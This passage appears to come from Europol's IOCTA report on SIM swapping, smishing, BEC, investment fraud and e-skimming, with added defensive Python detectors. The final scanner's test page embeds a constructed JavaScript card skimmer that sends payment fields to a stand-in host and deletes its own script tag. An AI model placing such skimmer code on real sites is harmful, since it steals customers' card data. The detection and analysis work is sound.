Composed of nationals between the ages of 22 and 52 years old from Italy, Romania, Colombia and Spain, this criminal gang struck over 100 times, stealing between €6 000 and €137 000 from bank accounts of unsuspecting victims per attack.

The modus operandi was simple, yet effective. The criminals managed to obtain the online banking credentials from the victims of the different banks through the use of banking Trojans or other types of malware. Once they had these credentials, the suspects would apply for a duplicate of the SIM cards of the victims, providing fake documents to the mobile service providers. With these duplicates in their possession, they would receive directly to their phones the 2FA codes sent by the banks to confirm the transfers.

The criminals then proceeded to make fraudulent transfers from the victims’ accounts to money mule accounts used to hide their traces. All this was done in a very short period – between one or two hours – which is the time it would take for the victim to realise that his/her phone number was no longer working.

Operation Smart Cash[48]

An eight-month-long investigation between the Romanian National Police and the Austrian Criminal Intelligence Service with the support of Europol has led to the arrest of 14 members of a crime gang who emptied bank accounts in Austria by gaining control over their victims’ phone numbers.

Law enforcement arrested the suspects earlier in February in Romania in simultaneous warrants at their homes in Bucharest (1), Constanta (5), Mures (6), Braila (1) and Sibiu (1).

The gang perpetrated the thefts, which netted dozens of victims in Austria, in the spring of 2019 in a series of SIM swapping attacks.

Once having gained control over a victim’s phone number, this particular gang would then use stolen banking credentials to log onto a mobile banking application to introduce a withdrawal which they then validated with an OTP sent by the bank via SMS, allowing them to withdraw money at cardless ATMs.

It is estimated that this gang managed to steal over half a million euros this way from unsuspecting bank account owners.
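Both case studies follow the same timeline: credentials stolen in advance, a duplicate SIM obtained from the operator, an SMS OTP delivered to the attacker's handset, and transfers or withdrawals completed within an hour or two. The control that timeline suggests for a bank is to stop trusting SMS OTP for a number whose SIM has just changed and to demand a different factor, or park the transfer, until the window has passed. The following is an added example, not code from the IOCTA report or from any bank or operator; the operator lookup is a constructed table (some operators do expose a last-SIM-change query, but the interface here is assumed), and the 72-hour quiet period, the new-payee limit, the phone numbers and the transfers are all constructed.

```python
"""SIM-swap-aware screening of transfer authorisations.

Added example, not code from the IOCTA report or any bank. A bank that can
learn when the operator last changed the SIM behind a number can refuse to
rely on SMS OTP during a quiet period after that change. All numbers,
timestamps, thresholds and the operator lookup below are constructed/assumed.
"""
from datetime import datetime, timedelta

# Constructed operator data: MSISDN -> timestamp of the most recent SIM change/port.
SIM_CHANGES = {
    "+34600000001": datetime(2020, 1, 14, 9, 5),   # swapped 85 minutes before the requests below
    "+34600000002": datetime(2019, 6, 2, 11, 0),   # changed months ago, no concern
}

QUIET_PERIOD = timedelta(hours=72)   # assumed policy: distrust SMS OTP for 72 h after a swap
NEW_PAYEE_LIMIT = 1000.0             # assumed policy: larger first payments need a stronger factor


def last_sim_change(msisdn):
    """Operator lookup stub; None means no SIM change on record."""
    return SIM_CHANGES.get(msisdn)


def screen_transfer(msisdn, amount, new_payee, requested_at):
    """Decide how a transfer may be authorised.

    Returns (decision, reason) with decision one of:
      'sms_otp'  - an SMS one-time password is acceptable
      'step_up'  - require a non-SMS factor (app push, hardware token, call-back)
      'hold'     - park the transfer for the fraud desk
    """
    changed = last_sim_change(msisdn)
    if changed is not None and timedelta(0) <= requested_at - changed <= QUIET_PERIOD:
        age = requested_at - changed
        # SMS to this number may now reach whoever holds the duplicate SIM.
        if new_payee:
            return ("hold", f"SIM changed {age} ago and payee is new")
        return ("step_up", f"SIM changed {age} ago; SMS OTP not trusted")
    if new_payee and amount > NEW_PAYEE_LIMIT:
        return ("step_up", "first payment to this payee exceeds limit")
    return ("sms_otp", "no SIM-swap indicator")


def screen_batch(records):
    """records: iterable of (ref, msisdn, amount, new_payee, 'YYYY-MM-DDTHH:MM').
    Returns {ref: decision}."""
    decisions = {}
    for ref, msisdn, amount, new_payee, when in records:
        requested_at = datetime.fromisoformat(when)
        decisions[ref] = screen_transfer(msisdn, amount, new_payee, requested_at)[0]
    return decisions


# Constructed authorisation requests mirroring the case studies' timing.
SAMPLE_REQUESTS = [
    ("T1", "+34600000001", 6000.0, True,  "2020-01-14T10:30"),  # swapped SIM, new (mule) payee
    ("T2", "+34600000001", 40.0,   False, "2020-01-14T10:30"),  # swapped SIM, known payee
    ("T3", "+34600000002", 40.0,   False, "2020-01-14T10:30"),  # old SIM change, small amount
    ("T4", "+34600000003", 5000.0, True,  "2020-01-14T10:30"),  # no record, large new payee
]

if __name__ == "__main__":
    for ref, decision in screen_batch(SAMPLE_REQUESTS).items():
        print(ref, decision)
```

The decision keys on the combination the case studies describe (fresh SIM change plus a first-time payee) rather than on amount alone, because the Spanish gang's per-attack takings ranged from €6 000 to €137 000 and a pure amount threshold would have let the smaller transfers through.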

Similar to SIM swapping, SMishing has seen an increase over the past twelve months. SMishing refers to the sending of fraudulent text messages purporting to be from trusted senders, typically targeting financial institutions and their customers.

SMishing is a lucrative alternative to phishing by email for a number of reasons. As most bank customers receive the advice to be suspicious of emails, customers do not yet have the same level of scepticism towards potentially fraudulent text messages. In addition, it is difficult, if not impossible, for banks to protect their customers from SMishing attacks, as criminals aim to abuse the Alpha Tag of the SMS thread and Signaling System 7 (SS7) vulnerabilities.
SIM SWAPPING – A MOBILE PHONE SCAM

SIM swapping occurs when a fraudster, using social engineering techniques, takes control over your mobile phone SIM card using your stolen personal data.

HOW DOES IT WORK?

A fraudster obtains the victim’s personal data through e.g. data breaches, phishing, social media searches, malicious apps, online shopping, malware, etc.

With this information, the fraudster dupes the mobile phone operator into porting the victim’s mobile number to a SIM in his possession.

The fraudster can now receive incoming calls and text messages, including access to the victim’s online banking.

The victim will notice the mobile phone lost service, and eventually will discover they cannot log in to their bank account.

WHAT CAN YOU DO?

Keep your software updated, including your browser, antivirus and operating system.

Restrict information and show caution with regard to social media.

Never open suspicious links or attachments received by email or text message.

Do not reply to suspicious emails or engage over the phone with callers that request your personal information.

Update your passwords regularly.

Buy from trusted sources. Check the ratings of individual sellers.

Download apps only from official providers and always read the apps’ permissions.

When possible, do not associate your phone number with sensitive online accounts.

Set up your own PIN to restrict access to the SIM card. Do not share this PIN with anyone.

Frequently check your financial statements.

ARE YOU A VICTIM?

If your mobile phone loses reception for no reason, report it immediately to your service provider.

If your service provider confirms that your SIM has been swapped, report it to the police.

Exploitation of 2FA behind smart ID

Three EU Member States reported cases of SMishing. Criminals used SMishing to bypass the 2FA mechanism offered by national smart IDs. Criminals aiming to attack bank accounts and the respective national banking infrastructure targeted these national Smart ID solutions through social engineering. Abusing alphanumeric SMS threads, criminals sent SMS appearing to come from the bank. These text messages prompted the recipients to log in to their online bank accounts using their smart ID, for instance to change their bank information. Following the link, they were then directed to fake bank log-in account pages, which would verify a fraudulent transaction initiated by the criminal after they attempted to log in. Alternatively, threat actors would use this modus operandi to create a new Smart ID account under the victim’s name, but under full criminal control.
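The SMishing sidebar and the smart-ID case both turn on one thing the bank cannot control (the sender name shown in the SMS thread) and one thing it can check (where the link actually leads). The following is an added example, not code from the IOCTA report or any bank, for a fraud desk triaging the text messages customers forward: it extracts the links, normalises each host, and accepts a host only when it is one of the bank's registered domains or a proper subdomain of one, so that a host that merely starts with the bank's name is rejected. The bank domain `yourbank.example`, the lure word list and the three sample messages are constructed; the first sample reuses the wording of the bank smishing infographic on the following page.

```python
"""Triage of reported bank text messages (smishing).

Added example, not code from the IOCTA report or any bank. BANK_DOMAINS,
LURE_TERMS and the sample messages are constructed assumptions.
"""
import re
from urllib.parse import urlsplit

BANK_DOMAINS = {"yourbank.example"}   # assumed: the bank's registered domains
URL_RE = re.compile(r"(?:https?://|www\.)[^\s<>\"']+", re.IGNORECASE)
LURE_TERMS = ("verify", "update", "reactivate", "suspended", "new rules")


def host_of(url):
    """Hostname of a URL in lower-case ASCII (punycode for non-ASCII labels,
    so that look-alike Unicode hosts show their xn-- form)."""
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    host = urlsplit(url).hostname or ""
    try:
        return host.encode("idna").decode("ascii").lower()
    except UnicodeError:
        return host.lower()


def is_bank_host(host):
    """True only for an exact bank domain or a subdomain of it on a label
    boundary: 'alerts.yourbank.example' passes, 'yourbank.example.evil.example'
    and 'yourbank-example.example' do not."""
    return any(host == d or host.endswith("." + d) for d in BANK_DOMAINS)


def triage_sms(text):
    """Return hosts found, the ones not belonging to the bank, lure words and a verdict."""
    hosts = [host_of(u) for u in URL_RE.findall(text)]
    foreign = [h for h in hosts if not is_bank_host(h)]
    lures = [t for t in LURE_TERMS if t in text.lower()]
    if foreign:
        verdict = "suspicious"       # a link that is not ours is enough on its own
    elif lures:
        verdict = "review"           # pressure wording without a foreign link
    else:
        verdict = "likely_legit"
    return {"hosts": hosts, "foreign_hosts": foreign, "lures": lures, "verdict": verdict}


# Constructed reports. The first mirrors the infographic's example message.
SAMPLES = [
    "YOUR BANK: Due to the new rules we need you to verify your bank account "
    "details. Please click here http://yourbank.eu to verify your details.",
    "Your one-time code is 123456. Manage alerts at https://alerts.yourbank.example/settings",
    "Account suspended. Reactivate now: https://yourbank.example.security-check.example/login",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage_sms(s)["verdict"], triage_sms(s)["foreign_hosts"])
```

The suffix test is the part worth copying: checking `host.endswith(d)` without the leading dot, or `d in host`, would accept the third sample, which is precisely the construction used when an attacker registers a domain that begins with the bank's name.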

4.3 BUSINESS EMAIL COMPROMISE REMAINS A THREAT AND GROWING AREA OF CONCERN

BEC remains a main and further growing threat for law enforcement and private industry. BEC is a sophisticated scam targeting businesses and organisations, whereby criminals employ social engineering techniques to gain access to an employee’s or executive’s email account to initiate bank transfers under fraudulent conditions, i.e. by pretending to be the CEO and asking the employee to carry out a payment.

BEC causes enormous losses and disruption to livelihoods and business operations[49]. Often following spear phishing emails, BEC is highly tailored and very effective, with targets ranging from governments, international organisations, small to large businesses and individuals.

The two most common types of BEC are CEO fraud (criminals impersonating a high-level executive requesting urgent bank transfers) and invoice fraud (criminals impersonating suppliers asking for legitimate payments to be directed to a bank account under the criminal’s control, or creating new, fraudulent invoices).

According to interviews with Member States, in many cases, BEC is carried out through a compromise of email accounts hosted by Office 365, access to which is typically gained through credential phishing in advance of the fraud. This is often possible due to limited security measures, such as a lack of 2FA, as well as a lack of awareness regarding spear phishing attempts. These types of attacks still mostly originate from Eastern Europe, Nigeria and other African countries. The most sophisticated threat actors come from Israel.

BEC has increased, grown in sophistication, and become more targeted

Over the past twelve months, BEC has increased across most EU Member States, with an additional increase as a result of the global outbreak of COVID-19. This increase in volume coincides with a growing sophistication and a more targeted approach. Criminals make use of technically advanced measures, such as compromising bank accounts, identifying the ideal time to strike, managing email conversations with complex man-in-the-middle attacks or even using Artificial Intelligence (AI) to mimic the voice of a company’s CEO[50]. The growing sophistication of BEC is also reflected in the establishment and use of complex criminal networks, which are used to launder the proceeds of the fraud. Additionally, criminals have become better at local languages and the exploitation of local contexts.

While criminals target all kinds of organisations and businesses, there is an increased focus on smaller companies, rather than just large corporations. As a result, even cybersecurity companies not usually dealing with BEC have been receiving requests for technical assistance, for instance to conduct forensic investigations on the servers.

BANK SMISHING SMS

Smishing (a combination of the words SMS and Phishing) is the attempt by fraudsters to acquire personal, financial or security information by text message.

Example message:

YOUR BANK
Due to the new rules we need you to verify your bank account details. Please click here http://yourbank.eu to verify your details.

HOW DOES IT WORK?

The text message will typically ask you to click on a link or call a phone number in order to 'verify', 'update' or 'reactivate' your account. But... the link leads to a bogus website and the phone number leads to a fraudster pretending to be the legitimate company.

WHAT CAN YOU DO?

Don't click on links, attachments or images that you receive in unsolicited text messages without first verifying the sender.

Don't be rushed. Take your time and make the appropriate checks before responding.

Never respond to a text message that requests your PIN or your online banking password or any other security credentials.

If you think you might have responded to a smishing text and provided your bank details, contact your bank immediately.
Criminals likely to abuse voice biometrics

In the future, law enforcement and industry expect to see an increased use of voice biometrics to commit impersonation fraud. While biometrics are currently working well, attempts to compromise them to get access to bank accounts for BEC are expected to proliferate as additional security measures are being implemented.

Industry case study

A private sector partner reported a case in which a threat actor used social engineering and blended attacks to target the bank and its corporate clients simultaneously. The fraudster, having gained access to the client's email network, contacted the bank to request a change of the client's beneficiary account. The perpetrator subsequently managed the conversation and information exchange between the bank and the corporate client at the same time. Through this, the perpetrator showed a thorough understanding of the bank's processes and knowledge of who to speak to in order to change the account.

Industry case study

One private sector partner reported a case in which a criminal impersonated its CEO while at a conference. The threat actor made initial contact through WhatsApp, using a spoofed ID account and picture of the CEO, and subsequently sent a forged email from the CEO about an urgent acquisition. Using information taken from open sources, the attack was highly targeted and convincing, demonstrating detailed knowledge about the CEO's current whereabouts. The fraud, the payment of an invoice which never existed, was stopped only at the last moment, when a missing purchase order number raised a red flag.
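The compromise-first pattern described in 4.3 (credentials phished in advance, then the mailbox used to "manage" the conversation with the bank or the counterparty) leaves traces in the tenant's audit log. The following is an added example, not code or data from the IOCTA or from any affected organisation. It assumes, as is commonly the case in such intrusions but is not stated in the text, that the criminal sets inbox rules to divert or hide finance-related mail, and it runs over a handful of constructed records in a simplified rendition of Office 365 unified audit log events (field names follow the real schema; the tenant domain, addresses and IPs are invented):

```python
"""Hunt for BEC mailbox tampering in Office 365 unified audit log records.

Added example. SAMPLE_LOG is constructed; ORG_DOMAINS is an assumption
standing in for the victim organisation's own domains.
"""
import re

ORG_DOMAINS = {"example.com"}
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}
HIDE_FOLDERS = {"rss subscriptions", "deleted items", "archive", "junk email", "conversation history"}
FINANCE_WORDS = ("invoice", "payment", "wire", "iban", "bank", "remittance", "purchase order")
RULE_OPS = {"New-InboxRule", "Set-InboxRule"}

# Constructed records (not from any real tenant), shaped like the AuditData of
# Search-UnifiedAuditLog output, keeping only the fields used here.
SAMPLE_LOG = [
    {"CreationTime": "2020-03-02T07:41:10", "Operation": "UserLoggedIn",
     "UserId": "alice@example.com", "ClientIP": "198.51.100.23", "Parameters": []},
    {"CreationTime": "2020-03-02T07:43:52", "Operation": "New-InboxRule",
     "UserId": "alice@example.com", "ClientIP": "198.51.100.23",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "ap.archive@example.net"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"CreationTime": "2020-03-02T07:44:30", "Operation": "New-InboxRule",
     "UserId": "alice@example.com", "ClientIP": "198.51.100.23",
     "Parameters": [{"Name": "Name", "Value": "Invoices"},
                    {"Name": "SubjectContainsWords", "Value": "invoice;payment;IBAN"},
                    {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"CreationTime": "2020-03-02T09:12:05", "Operation": "New-InboxRule",
     "UserId": "bob@example.com", "ClientIP": "203.0.113.8",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "FromAddressContainsWords", "Value": "news@vendor.example.com"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
]

ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def params(record):
    """Flatten the Name/Value parameter list of an Exchange admin audit event."""
    return {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}


def external_recipients(value):
    """Addresses in a rule parameter whose domain is not one of ours."""
    return [a for a in ADDR_RE.findall(value) if a.split("@")[1].lower() not in ORG_DOMAINS]


def rule_findings(record):
    """Findings for one inbox-rule event; empty for any other operation."""
    if record.get("Operation") not in RULE_OPS:
        return []
    p = params(record)
    base = {"user": record["UserId"], "time": record["CreationTime"],
            "ip": record.get("ClientIP"), "rule": p.get("Name", "")}
    out = []
    # 1. mail leaving the organisation through a rule
    for key in sorted(FORWARD_PARAMS.intersection(p)):
        ext = external_recipients(p[key])
        if ext:
            out.append({**base, "finding": "forwards mail outside the organisation",
                        "detail": f"{key} -> {', '.join(ext)}"})
    # 2. finance-related mail hidden from the mailbox owner
    words = " ".join(p.get(k, "") for k in
                     ("SubjectContainsWords", "BodyContainsWords", "FromAddressContainsWords")).lower()
    hides = (p.get("DeleteMessage", "").lower() == "true"
             or p.get("MoveToFolder", "").lower() in HIDE_FOLDERS)
    hit = [w for w in FINANCE_WORDS if w in words]
    if hides and hit:
        out.append({**base, "finding": "hides finance-related mail from the owner",
                    "detail": f"matches {hit}, action {p.get('MoveToFolder') or 'delete'}"})
    # 3. rules named with nothing or punctuation only, to blend into the rules list
    if not base["rule"].strip(" ."):
        out.append({**base, "finding": "rule with empty or punctuation-only name",
                    "detail": repr(base["rule"])})
    return out


def hunt(records):
    return [f for r in records for f in rule_findings(r)]


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['time']} {f['user']} from {f['ip']}: {f['finding']} ({f['detail']})")
```

In a real tenant the records come from Search-UnifiedAuditLog (the rule parameters sit inside the AuditData JSON), and the UserLoggedIn events from the same ClientIP in the minutes before a rule was created are the next thing to pull. For the bank-and-client man-in-the-middle in the first case study, a rule keyed on the bank's sender address is the equivalent to look for.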
4.4 ONLINE INVESTMENT FRAUD DRAWS IN VICTIMS ALL OVER EUROPE

Another relative 'newcomer' in this year's IOCTA is online investment fraud. Many law enforcement agencies and financial services identified online investment fraud as one of the fastest-growing crimes of the past twelve months, generating millions of losses and affecting thousands of victims from all EU countries. Many Member States witnessed this type of fraud for the first time.

Online investment fraud refers to a fraud type whereby criminals aim to lure their victims into transferring them money with appealing get-rich-quick schemes. Offering commodities such as cryptocurrencies, diamonds, or gold, criminals promise victims extraordinary financial returns on their investments, while keeping victims engaged through websites showing fake investment returns. While online investment fraud usually accounts for mid-level money losses, some victims have lost their entire life savings before realising that they had fallen victim to a scam.

Online investment fraud demonstrates a high level of complexity

A number of online investment fraud cases have shown a significant level of complexity, with large networks of shell companies and call centres behind these schemes, as well as the development of software and communication tactics to systematise the exploitation of victims to their last cent.

In some cases, criminals have asked victims to install RATs to take control over the target computer, to initiate money transfers to criminals through full control over the computer and bank account. In addition to eliciting money transfers from their victims, criminals have also been seen to combine this type of fraud with phishing and the theft of credentials to be used subsequently for additional fraud.

Criminals usually target victims through social media, using celebrities and fake versions of news outlets, or victims come across the fraudulent investment websites via search engines. Criminals have also been seen employing blended social engineering, with a mix of SMishing, cold calling and other techniques. Often these targets include older victims, who are less technologically savvy.

Online investment fraud is difficult to investigate, as criminals set up complex international schemes of companies with a legal appearance, spanning several legal jurisdictions. The groups behind these schemes are difficult to identify, due in part to their use of anonymisation tools, spoofed phone numbers and legitimate-looking websites.

Given the fast rise of investment fraud in many EU Member States, law enforcement agencies expect this type of fraud to continue to increase and to appear in so far unaffected countries, too. Perpetrators generally seem to originate from Russia, Ukraine and other Eastern European countries.

4.5 CARD-NOT-PRESENT FRAUD CONTINUES TO INCREASE AS CRIMINALS DIVERSIFY

CNP fraud, such as carding and e-skimming, has increased over the past twelve months, with criminals shifting to new sectors and employing novel modi operandi.

Carding refers to the use of stolen card data to purchase goods or services. While carding has increased, criminals have moved away from targeting the airline industry towards the accommodation and rental sectors. The reduction in airline fraud is a direct result of successful public-private cooperation, which reduced the overall losses by nearly 50% and pushed criminals to other sectors. This is in addition to the purchase of goods such as mobile devices, phones and electronics, which criminals bring in from other countries using compromised card details.

Investigating carding on the dark web

During the Carding Action Week at the end of 2018, the Hungarian police launched an investigation into a vendor who was active on various markets offering card details from Hungarian cardholders.

The vendor was using different Pretty Good Privacy (PGP) public keys on the various market places, but the police were able to decode these keys. This made it possible to identify the vendor's primary e-mail address used for registration on these market places.

During the investigation, the police were able to link the vendor's activities offering 400 account details from various financial institutions, including 198 Visa accounts. Visa provided the necessary evidence and law enforcement arrested the vendor, and he is currently in custody awaiting trial. The cooperation between the Hungarian Police and Visa resulted in the saving of €227 286 of potential fraud losses.
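"Decoding" a PGP public key in the Hungarian case means reading the metadata every OpenPGP key carries in the clear: the user ID packets (the name and e-mail address the vendor typed at key creation) and the key fingerprint, which is also what the DarkNet Trust service described in section 5.2 searches on. The following added example is not from the IOCTA or the Hungarian police; it parses RFC 4880 public key blocks with the standard library only and pivots across two constructed keys (non-functional RSA material, invented market names and e-mail address) that share a user ID:

```python
"""Pull cleartext metadata (user IDs, V4 fingerprint) out of OpenPGP public
key blocks and pivot across keys that share an e-mail address.

Added example. The sample keys are constructed: their RSA material is a
small dummy value, not a usable key; only the packet structure is real.
"""
import base64
import hashlib
import re
import struct

PUBLIC_KEY, USER_ID = 6, 13        # packet tags, RFC 4880 section 4.3


def crc24(data: bytes) -> int:
    """ASCII-armor checksum (RFC 4880 section 6.1)."""
    crc = 0xB704CE
    for b in data:
        crc ^= b << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def dearmor(armored: str) -> bytes:
    """Strip the armor, base64-decode the body and verify the CRC line if present."""
    lines = armored.strip().splitlines()
    start = lines.index("") + 1                    # armor headers end at the first blank line
    body, crc_line = [], None
    for line in lines[start:]:
        if line.startswith("-----END"):
            break
        if line.startswith("="):
            crc_line = line[1:]
        else:
            body.append(line.strip())
    data = base64.b64decode("".join(body))
    if crc_line and int.from_bytes(base64.b64decode(crc_line), "big") != crc24(data):
        raise ValueError("armor checksum mismatch")
    return data


def packets(data: bytes):
    """Yield (tag, body) for old- and new-format packet headers (RFC 4880 section 4.2)."""
    i = 0
    while i < len(data):
        hdr, i = data[i], i + 1
        if not hdr & 0x80:
            raise ValueError("bad packet header")
        if hdr & 0x40:                               # new format
            tag, first, i = hdr & 0x3F, data[i], i + 1
            if first < 192:
                length = first
            elif first < 224:
                length, i = ((first - 192) << 8) + data[i] + 192, i + 1
            elif first == 255:
                length, i = struct.unpack(">I", data[i:i + 4])[0], i + 4
            else:
                raise ValueError("partial body lengths not supported")
        else:                                        # old format
            tag, n = (hdr >> 2) & 0x0F, (1, 2, 4, 0)[hdr & 3]
            if not n:
                raise ValueError("indeterminate length not supported")
            length, i = int.from_bytes(data[i:i + n], "big"), i + n
        yield tag, data[i:i + length]
        i += length


def v4_fingerprint(key_body: bytes) -> str:
    """SHA-1 over 0x99, two-octet length and the key packet body (RFC 4880 section 12.2)."""
    return hashlib.sha1(b"\x99" + struct.pack(">H", len(key_body)) + key_body).hexdigest().upper()


def key_metadata(armored: str) -> dict:
    meta = {"fingerprint": None, "user_ids": []}
    for tag, body in packets(dearmor(armored)):
        if tag == PUBLIC_KEY and meta["fingerprint"] is None:
            meta["fingerprint"] = v4_fingerprint(body)
        elif tag == USER_ID:
            meta["user_ids"].append(body.decode("utf-8", "replace"))
    return meta


def pivot_by_email(keys: dict) -> dict:
    """Map each e-mail found in a user ID to the (market, fingerprint) pairs using it."""
    groups = {}
    for market, armored in keys.items():
        meta = key_metadata(armored)
        for uid in meta["user_ids"]:
            for email in re.findall(r"<([^>]+)>", uid):
                groups.setdefault(email.lower(), []).append((market, meta["fingerprint"]))
    return groups


# --- constructed sample keys (dummy RSA values, invented identities) -------
def _mpi(n: int) -> bytes:
    return struct.pack(">H", n.bit_length()) + n.to_bytes((n.bit_length() + 7) // 8, "big")


def _packet(tag: int, body: bytes) -> bytes:
    return bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", len(body)) + body   # old format, 2-octet length


def make_sample_key(n: int, uid: str) -> str:
    key_body = b"\x04" + struct.pack(">I", 1_546_300_800) + b"\x01" + _mpi(n) + _mpi(65537)
    data = _packet(PUBLIC_KEY, key_body) + _packet(USER_ID, uid.encode())
    crc = base64.b64encode(crc24(data).to_bytes(3, "big")).decode()
    return ("-----BEGIN PGP PUBLIC KEY BLOCK-----\n\n" + base64.b64encode(data).decode()
            + "\n=" + crc + "\n-----END PGP PUBLIC KEY BLOCK-----\n")


VENDOR_KEYS = {   # a different key per market, but the same e-mail typed into each user ID
    "market A": make_sample_key(0xC0FFEE1234567, "cardshop_hu <dumps.seller@example.org>"),
    "market B": make_sample_key(0xDEADBEEF98765, "plasticking <Dumps.Seller@example.org>"),
}
```

Run `pivot_by_email(VENDOR_KEYS)` and the two unrelated fingerprints collapse onto one address. The same parser applied to keys scraped from vendor pages gives the fingerprint list a service like DarkNet Trust matches on; the e-mail pivot is what the Hungarian investigators needed, because the fingerprints themselves differed from market to market.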
Criminals take the stolen card details from dark web marketplaces (such as Joker's Stash[51]), which make it increasingly easy to obtain stolen credentials from specific forums. Since these Darkweb forums typically require payment or some kind of interaction in order to gain entry, access is often difficult for law enforcement to obtain.

E-commerce/digital skimming a low-risk and high-value modus operandi

The compromise of card data through e-skimming (also referred to as digital skimming) has increased, with technically knowledgeable organised criminal groups targeting e-commerce merchants with weak security measures. While criminals are sometimes seen targeting bigger companies when they see the opportunity, e-skimming mostly affects smaller to medium-size merchants, who do not have the capabilities to put into place sufficient protection and who, as a result, are often compromised without being aware of the criminal activity taking place on their sites.

In an e-skimming attack, criminals inject malicious JavaScript code into the merchants' checkout pages, which allows them to capture personal data
and credit card credentials. The malicious code typically checks the various customer and payment account number inputs and exfiltrates the data to an attacker-controlled C&C server, following which criminals can use this information to commit other crimes. Criminals commonly exploit, for example, improperly configured cloud data repositories, occasionally utilising automated processes to target vulnerabilities. Other entry points that criminals have increasingly been targeting include e-commerce merchants directly, or their service providers, which supply solutions ranging from analytics and advertisements to other general IT services.

The most common type of e-skimming activity which interviewees mentioned relates to the use of Magecart malware by organised criminal groups. This type of digital skimming has proven to be so lucrative that many established cybercriminals have moved into conducting such attacks, with JavaScript-based skimming now considered one of the main threats to financial institutions.

Private sector respondents have seen different variants of point of sale (POS) malware, including PwnPOS, AlinaPOS, and POSeidon / Backoff. FIN7 and FIN8 have been active threat actors in this area. FIN8 has also been observed using new malware toolsets to target POS environments.

As with other cybercrime areas, e-skimming, too, has seen criminals coming up with novel technical ways to execute their attacks, such as the Pipka malware.

Spotlight: FIN6

FIN6 is a prolific group of criminals, which has been targeting merchant point of sale (POS) systems to gather payment account data. In 2019, they expanded their attacks to e-commerce merchants, which represents a merger between CNP fraud and e-commerce breaches. The attackers injected malicious code into the merchants' websites, which would gather payment account number inputs and send these account numbers to an attacker-controlled C2 server. Other skimmers have been observed gathering more input data than payment account numbers, which puts users' data at risk.

Spotlight: Pipka

Pipka is a new form of JavaScript skimmer which allows cybercriminals to configure which form fields the programme will parse and extract, including payment account numbers, expiration dates, card verification values and the payment cardholder's name and address. Pipka has the added feature of being able to remove its malicious JavaScript component from the Hypertext Markup Language (HTML) code after successful execution. This is a new development in JavaScript skimming, and it adds interesting new layers to the malware. The Pipka skimmer reflects advancements made in e-skimming, and it goes to show that criminals targeting e-commerce will continue to develop innovative approaches to gather sensitive payment account data.
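The skimmer behaviour described above and in the Pipka spotlight (hooking the payment fields, sending their values to an attacker-controlled host, then deleting its own script element so that a view of the live DOM looks clean) can be hunted for on a merchant's own checkout page. The following is an added example, not code from the IOCTA, from Magecart or from Pipka. The checkout page it scans is constructed, with one inline script written to show the skimmer pattern in minimal form, and the allowlist of hosts permitted to serve scripts is an assumption a merchant would replace with its own:

```python
"""Heuristic scan of a checkout page for e-skimming indicators.

Added example. SAMPLE_CHECKOUT is a constructed page (its inline skimmer
is a minimal illustration of the pattern, not real malware) and
ALLOWED_SCRIPT_HOSTS stands in for the merchant's own host and CDN.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

SAMPLE_CHECKOUT = """
<html><body>
<form id="pay"><input name="cardnumber"><input name="expiry"><input name="cvv"></form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://cdn.example/analytics.js"></script>
<script src="https://stats-collect.example.net/t.js"></script>
<script>window.dataLayer = window.dataLayer || []; dataLayer.push({event: 'checkout_view'});</script>
<script>
document.getElementById('pay').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  if (d.cardnumber && d.cvv) {
    new Image().src = 'https://stats-collect.example.net/c.gif?d=' + btoa(JSON.stringify(d));
  }
});
document.currentScript.parentNode.removeChild(document.currentScript);
</script>
</body></html>
"""

FIELD_RE = re.compile(r"card|cc[-_]?num|\bpan\b|cvv|cvc|expir|holder", re.I)
SEND_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image|\.src\s*=|WebSocket", re.I)
SELF_REMOVE_RE = re.compile(r"currentScript[\s\S]{0,80}?(\.remove\s*\(|removeChild)", re.I)
DECODE_RE = re.compile(r"\batob\s*\(|fromCharCode|\beval\s*\(|\bunescape\s*\(")
URL_HOST_RE = re.compile(r"https?://([\w.-]+)")


class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> on the page."""

    def __init__(self):
        super().__init__()
        self.scripts, self._current = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = (dict(attrs).get("src"), [])

    def handle_data(self, data):
        if self._current is not None:
            self._current[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            src, parts = self._current
            self.scripts.append((src, "".join(parts)))
            self._current = None


def assess(src, body):
    """Reasons a script looks like a skimmer; an unlisted external host is one by itself."""
    if src:
        host = urlparse(src).hostname
        return [] if host in ALLOWED_SCRIPT_HOSTS else [f"external script from unlisted host {host}"]
    reasons = []
    if FIELD_RE.search(body) and SEND_RE.search(body):
        reasons.append("reads payment form fields and sends data out")
    for host in sorted(set(URL_HOST_RE.findall(body)) - ALLOWED_SCRIPT_HOSTS):
        reasons.append(f"contacts unlisted host {host}")
    if SELF_REMOVE_RE.search(body):
        reasons.append("removes its own <script> element after running (Pipka-style)")
    if DECODE_RE.search(body):
        reasons.append("uses decode/eval primitives typical of obfuscated loaders")
    return reasons


def scan(html):
    """Return the scripts on the page that need a look, with reasons."""
    collector = ScriptCollector()
    collector.feed(html)
    flagged = []
    for index, (src, body) in enumerate(collector.scripts):
        reasons = assess(src, body)
        # one reason is enough for an external script; inline code needs two to cut noise
        if reasons and (src or len(reasons) >= 2):
            flagged.append({"script": src or f"inline #{index}", "reasons": reasons})
    return flagged


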